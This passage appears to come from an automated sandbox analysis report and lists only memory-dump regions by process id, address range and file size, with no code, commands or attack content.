                                                                                                                                                                                                                                                                                                                        • memory/3872-168-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          100KB

                                                                                                                                                                                                                                                                                                                        • memory/3872-166-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          100KB

                                                                                                                                                                                                                                                                                                                        • memory/3872-167-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          100KB

                                                                                                                                                                                                                                                                                                                        • memory/3872-149-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/3956-177-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/3980-291-0x00000000011A0000-0x00000000011A2000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                                                        • memory/3980-288-0x00000000009B0000-0x00000000009B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/3980-284-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/3996-613-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          32KB

                                                                                                                                                                                                                                                                                                                        • memory/4008-179-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4036-518-0x0000000005290000-0x0000000005291000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4036-355-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4328-193-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4500-181-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4584-297-0x0000000003990000-0x0000000003AD0000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                                                                                                                        • memory/4584-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4600-339-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4648-335-0x0000000000740000-0x000000000076F000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          188KB

                                                                                                                                                                                                                                                                                                                        • memory/4648-299-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4668-384-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4744-237-0x0000000000510000-0x0000000000519000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          36KB

                                                                                                                                                                                                                                                                                                                        • memory/4744-211-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4768-236-0x0000000000780000-0x00000000007C8000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          288KB

                                                                                                                                                                                                                                                                                                                        • memory/4768-198-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4784-239-0x0000000000A80000-0x0000000000A81000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4784-244-0x0000000005480000-0x0000000005481000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4784-260-0x0000000005940000-0x0000000005BC6000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          2.5MB

                                                                                                                                                                                                                                                                                                                        • memory/4784-212-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4784-255-0x0000000005BD0000-0x0000000005BD1000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4784-242-0x00000000053E0000-0x00000000053E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4788-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4796-241-0x0000000004F80000-0x0000000004F81000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4796-243-0x0000000007660000-0x0000000007661000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4796-319-0x0000000008370000-0x0000000008371000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4796-197-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4796-247-0x00000000033B0000-0x00000000033B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4796-249-0x00000000033B2000-0x00000000033B3000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4796-272-0x0000000007ED0000-0x0000000007ED1000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4796-259-0x0000000007470000-0x0000000007471000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4796-292-0x0000000007FB0000-0x0000000007FB1000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4796-262-0x00000000075D0000-0x00000000075D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4804-201-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4804-238-0x0000000000A70000-0x0000000000B44000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          848KB

                                                                                                                                                                                                                                                                                                                        • memory/4812-273-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4816-369-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4816-556-0x00000000053A0000-0x00000000053A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/4820-191-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4884-215-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4924-342-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/4924-587-0x00000000052E0000-0x00000000052E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/5004-146-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/5032-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/5044-379-0x000000001D2C0000-0x000000001D2C2000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                                                        • memory/5044-274-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/5044-277-0x0000000000F50000-0x0000000000F51000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/5072-230-0x0000000000A30000-0x0000000000A31000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/5072-254-0x000000001B7B0000-0x000000001B7B2000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                                                        • memory/5072-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/5072-245-0x0000000001300000-0x0000000001301000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/5152-471-0x0000000004960000-0x0000000004BE6000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          2.5MB

                                                                                                                                                                                                                                                                                                                        • memory/5168-600-0x0000000005420000-0x0000000005421000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/5200-583-0x0000000000690000-0x00000000006C0000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          192KB

                                                                                                                                                                                                                                                                                                                        • memory/5200-349-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/5208-228-0x0000000000870000-0x0000000000871000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/5208-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/5260-279-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/5260-282-0x00000000005B0000-0x00000000005B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/5260-287-0x0000000000C70000-0x0000000000C71000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/5260-290-0x000000001B2E0000-0x000000001B2E2000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                                                        • memory/5324-324-0x0000023453D80000-0x0000023453D82000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                                                        • memory/5324-316-0x0000023439670000-0x0000023439671000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/5324-445-0x0000023453D85000-0x0000023453D87000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                                                        • memory/5324-441-0x0000023453D84000-0x0000023453D85000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/5324-431-0x0000023453D82000-0x0000023453D84000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                                                        • memory/5324-313-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/5452-413-0x0000000005760000-0x0000000005761000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/5452-298-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/5452-347-0x0000000000720000-0x0000000000721000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/5500-509-0x0000000005390000-0x00000000059A8000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          6.1MB

                                                                                                                                                                                                                                                                                                                        • memory/5692-256-0x00000000009F0000-0x00000000009F2000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                                                        • memory/5692-251-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/5784-333-0x0000000000750000-0x0000000000751000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/5784-332-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/5876-296-0x0000000005120000-0x0000000005121000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/5876-264-0x0000000000710000-0x0000000000711000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/5876-311-0x0000000007880000-0x0000000007881000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/5876-293-0x0000000001050000-0x0000000001051000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/5876-257-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/5876-320-0x0000000007F80000-0x0000000007F81000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/5992-265-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/5992-270-0x0000000000230000-0x0000000000231000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/6016-325-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                        • memory/6016-408-0x00000000055B0000-0x00000000055B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/6016-357-0x0000000005BE0000-0x0000000005BE1000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/6016-337-0x00000000003D0000-0x00000000003D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/6224-524-0x0000000004DE0000-0x00000000053F8000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          6.1MB

                                                                                                                                                                                                                                                                                                                        • memory/6288-529-0x0000000005890000-0x0000000005EA8000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          6.1MB

                                                                                                                                                                                                                                                                                                                        • memory/6368-566-0x0000000005190000-0x0000000005191000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                        • memory/6488-602-0x000000001C910000-0x000000001C912000-memory.dmp
                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          8KB